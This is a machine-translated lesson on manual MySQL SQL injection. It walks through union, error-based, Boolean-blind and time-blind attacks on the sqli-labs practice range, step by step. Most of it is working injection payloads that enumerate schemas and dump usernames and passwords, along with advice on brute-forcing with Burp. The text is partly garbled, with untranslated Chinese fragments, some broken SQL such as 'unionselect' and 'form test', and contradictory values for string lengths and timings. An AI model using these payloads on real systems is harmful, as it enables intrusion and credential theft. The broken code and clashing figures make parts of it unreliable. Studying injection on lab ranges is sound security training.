Network Security Advanced Learning Lesson 10 - MySQL Manual Injection

---

1. Common functions of MYSQL database

---

2. MYSQL default 4 system databases and key libraries and tables

Key libraries:information_schema

---

3. Determine the database type

For PHP websites, commonly used databases are MYSQL and PostgreSQL.
Determine the database type:

• MYSQL：3306
• PostgreSQL：5432
• MSSQL：1433

---

4. Joint query injection

使用场景：数据库在页面中存在显示位。

UNION操作符Used to combine the results of two or more SELECT statements into a result set. The premise is that there must be two choices 相同列.

1. Specific steps (shooting range demonstration):

1) First determine the injection point

As follows:


Here you can determine that the injection point is at the id position

2) Determine whether it is numeric or character type

Use the 1/1 and 1/0 methods for testing.


Neither 1/1 nor 1/0 reports an error, which means there is no response. Explain 不是数字型.

Directly add 1 single quote and 2 single quotes to test.


An error will be reported for 1 single quote, but no error will be reported for 2 single quotes. Please explain 这是字符型.

3) To determine the number of columns of injection points

Use order by; order by is used for sorting. If order by 3 does not report an error, order by
4 reports an error, which means that the table only has 3 columns.
As follows:


POC used:
http://localhost/Less-1/?id=1' order by 4--+

Corresponding SQL statement:

select * from table name (unknown) where order by 4;
#Let him report an error

4) Get the display position of the database in the web page

After knowing the number of columns, you need to get the database in the web page 显示位(that is, the fields displayed on the web page). You can use union to splice error queries and self-constructed select statements.

As follows:

http://localhost/Less-1/?id=1

Corresponding SQL statement:

select * from table name (unknown) where id=1;

Shown on this page:

Your Login name: Dumb
Your Password: Dumb

http://localhost/Less-1/?id=2

Corresponding SQL statement:

select * from table name (unknown) where id=2;

The page shows:

Your Login name: Angelina
Your Password: I-kill-you

Construct an incorrect select query field, for example, change id=1 to id=-1

using the POC:
http://localhost/ Less-1/?id=-1' union select 1,2,3 --+

Corresponding SQL statement:

select * from table name (unknown) where id= -1 union select 1,2,3;

The page shows:

Your Login name: 2
Your Password: 3

In this way, we know 显示位that they are the 2nd and 3rd columns of the data table.

5) Construct POC to query user name and database name

Construct the function to be queried on the display position, such as the current user name and database name.

Construct the POC:
http://localhost/ Less-1/? id=-1' union select 1,user(),database()--+

Corresponding SQL statement:

select * from table name (unknown) where id= -1 union select 1,user(),database();

The page shows:

Your Login name: root@localhost
Your Password: security

This way I know the username and database name of the current database.

6) Check all table names in the database

POC used:
http://localhost/ Less-1/? id=-1' unionselect 1,2,table_name from information_schema.tables where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2, table_name from information_schema.tables where table_schema='security';

The above will only output the first table name email, but not all table names.

Output all table names and use group_concat()函数to splice the output.

POC used:
http://localhost/ Less-1/? id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='security';

In this way, you will know the names of all the tables in the security database: emails, referers, uagents, users

7) Find out all field names of a specific table

POC used:
http://localhost/ Less-1/? id=-1' unionselect 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security';

Now all the field names of all tables in the security database are output here.

Now there is another problem, that is, I only want to know the field names of sensitive data tables, such as the field names in the users table. At this time, I need to

use: POC:
http://localhost/ Less-1/? id=-1' unionselect 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';

Now you know all the field names of the users table. Suppose you know the fields: id, username, password.

8) Query all data in the users table

POC used:
http:// localhost/ Less-1/?id=-1' union select 1,group_concat(username), group_concat(password) from users--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,group_concat(username), group_concat(password) from users;

In this way, all student names and passwords have been found, and at the same time, we also know that the table displayed in the display bit is the users table.

Beautify it:

POC used:
http:// localhost/ Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,2, group_concat(username,'^',password) from users;

9) Use another way to view the data

You can also use the group_concat() function concat()+limitto view table data.

POC used:
http:// localhost/ Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users limit 0,1--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,2,group_concat(username,'^',password) from users limit 0,1;

This way you can look at them one by one.

---

5. Error injection

使用场景：数据库错误提示会在页面上显示。

1. Commonly used error reporting functions in MYSQL:

1）floor( )

Common injection syntax formats:

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x) a);

2）extractvalue( )

extractvalue(xml_frag, xpath_expr)
Extract a value from an xml string using xpath syntax.

xml_frag : The name of the xml document object, which is a string type.
xpath_expr : Path using xpath syntax format.

If xpath_expr parameter 不符合xpath格式，就会报错. It~ 符号(ascii编码值：0x7e) does not exist in the xpath format, so once the ~ symbol is used in the xpath_expr parameter, an error will be reported.

Common injection syntax formats:

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e),1));

3）updatexml( )

Common injection syntax formats:

select * form test where id=1 and (updatexml(1,concat(0x7e,(select user())),1));

4）geometrycollection( )

Common injection syntax formats:

select * from test where id=1 and geometrycollection((select * from(select user())a)b));

5）multipoint( )

Common injection syntax formats:

select * from test where id=1 and multipoint((select * from(select user())a)b));

6）polygon( )

Common injection syntax formats:

select * from test where id=1 and polygon((select * from(select user())a)b));

7）multipolygon( )

Common injection syntax formats:

select * from test where id=1 and multipolygon((select * from(select user())a)b));

8) line string( )

Common injection syntax formats:

select * from test where id=1 and linestring((select * from(select user())a)b));

9）multilinestring()

Common injection syntax formats:

select * from test where id=1 and multilinestring((select * from(select user())a)b));

10）exp( )

Common injection syntax formats:

select * from test where id=1 and exp(~(select * from(select user())a));

11）gtid_subset( )

Common injection syntax formats:

select gtid_subset(user(),1);

2. Error injection steps (shooting range demonstration)

1) Make sure that database errors will be displayed on the page

2) Find the injection point (refer to joint injection)

3) Determine whether it is numeric or character type (refer to joint injection)

4) Use the error reporting function to construct the wheel

It is used here updatexml()函数. If the second parameter of this function contains special characters, an error will be reported. Here 0x7e is the URL encoding of "~".

POC used:
http://localhost/ Less-1/?id=1' and updatexml(1,0x7e,1)--+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,0x7e,1);

5) Get the database name and user name

POC used:
http://localhost/ Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1)--+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,concat(0x7e,database()),1);

6) Get all table names

POC used:
http://localhost/ Less-1/?id=1' and updatexml(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)–+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1);

7) Get the field name of a specific table (refer to union injection)

8) Obtain data from a specific table (refer to joint injection)

3. Error injection has a string length limit

Commonly used functions for error injection usually have string length restrictions 最长输出32位. If you use the group_concat() function directly, the output will be incomplete.

Example:

POC used:
http://localhost/Less-1/?id=1' and updatexml(1, concat(0x7e,(select group_concat(username,'^',password) from users)),1) --+

In this way, only the content of 32 string lengths can be output, and the entire content cannot be output;

At this time, you need to use limit to operate and output one by one:

POC used:
http://localhost/Less-1/?id=1' and updatexml(1, concat(0x7e,(select concat(username, '^',password) from users limit 0,1)),1) --+

---

6. Blind bet

1. Boolean type blind injection

Usage scenario: There is no display space on the page, and database query errors will not be displayed on the page. There will only be two page prompts: correct query and query error, such as the following situation:

Normal, true

Add 1 single quote, which is false

Add 2 single quotes to be true

2. Boolean blind injection steps:

1) Find the injection point (refer to joint injection)

2) Construct the wheel

POC used:
http://localhost/Less-8/?id=1' and 1=if(1=1,1,0)--+

POC used:
http://localhost/Less-8/?id=1' and 1=if(1=2,1,0)--+

3) Get the current user name and database name length

POC used:
http://localhost/Less-8/?id=1' and 1= if(length(user())=8,1,0)--+

Then you can use BP to blast the length.



In this way, you can guess that the username string length is 14. Using the same method, you can find that the length of the current database name is 8.

4) Get the current user name and database name

Method 1:

http://localhost/Less-8/?id=1' and 1=if(mid(user(),1,1)='q',1,0)--+

You can also use BP blasting

to blast two payloads

First blast position, just use numbers

For the second explosive character, add English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.

In this way, it is exploded and the current user name is: root@localhost. The current database name can be obtained in the same way: security

Method 2:
When the interception function is disabled and cannot be used, then use like+‘_’
the example above. I already know that the string length of the current user name is 14, and I need to get the name of the user name.

The POC used:
http://localhost/Less- 8/?id=1' and 1= if(user()+like+'______________',1,0)--+

The return value here is true. Because the underscore "_" in regular expressions can represent any character.

In this way, we can use BP to blast bit by bit to obtain the corresponding user name.

5) Get the length of all table names in the current database

Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=10--+

Using BP blasting,



the length obtained here is 29 bits.

6) Get the names of all table names in the current database

Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a'--+

Use BP to blast.


The first payload mentioned above is known to be 29, so the dictionary selects 29.

The second payload dictionary adds English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.

Okay, so you know that all the table names are: emails, referers, uagents, users

7) Get the total length of all field names in the users table

Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=10--+

Same BP blasting.

In this way, we know that the total string length of the field names of the users table is 20

8) Get all field names of the users table

Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='a' --+

Also using BP blasting,

the field names of the users table are obtained: id, username, password

9) Get the total length of each row of all data in the users table

Construct POC:
http://localhost/Less-8/?id=1' and length((select concat(username,'^',password) from users limit 0,1))=10--+

Start using BP blasting.




In this way, you will know that the table has 13 rows in total, and the corresponding string length after concat splicing of each row.

10) Obtain the purpose data of users table

Since we already know the field names of the table, the number of data rows, and the total string length after splicing each row, we can blast it row by row.

POC used:
http://localhost/Less-8/?id=1 ' and mid((select concat(username,'^',password) from users limit 0,1),1,1)='a' --+
I won’t go into details about the specific BP blasting, the operation is similar.

3. Time blind injection

There is only one return value for the page: true. No matter what value is entered, the return situation will be handled normally. Add a specific time function ( sleep) to 返回的时间差determine whether the injected statement is correct by viewing the web page.
For example:

4. Time blind injection steps:

1) Find the injection point (refer to joint injection)

2) Determine whether it is numeric or character type (refer to joint injection)

3) Test whether the sleep function is filtered and whether it will be executed

The corresponding time of sleep(1) is 13158 milliseconds

The corresponding time of sleep(0) is 16 milliseconds

This shows that the sleep() function will be executed

4) Get the current username and database length

POC used:
http://localhost/Less-48/?sort=1 and if(length(user())=10,sleep(1),1)--+
Here is if the predicted length is sufficient, sleep(1) will be executed.

Explode using BP

下面需要勾选响应时间


There is an additional list of options. Since sleep(1) is executed correctly, the one with the longest response time is the correct result, which is 14 here. In the same way, the length of the exploded database name is 8.

5) Get the current user name and database name

http://localhost/Less-48/?sort=1 and if(mid(user(),1,1)='a',sleep(1),1)--+

Then use BP to blast



the second blasting payload dictionary. Pay attention to adding English letters + numbers + special symbols into it. Pay attention to whether the server is case-sensitive.

It can be seen here that the exploded user names in order are: root@localhost; similarly, the database name obtained by blasting using the same method is: security.

6) Get the total string length of all table names in the current database (refer to Boolean blind injection)

7) Get all the table names of the current database (refer to Boolean blind injection)

8) Get the total string length of all field names in the users table (refer to Boolean blind injection)

9) Get all field names of the users table (refer to Boolean blind injection)

10) Obtain the target data of the users table (refer to Boolean blind injection)

---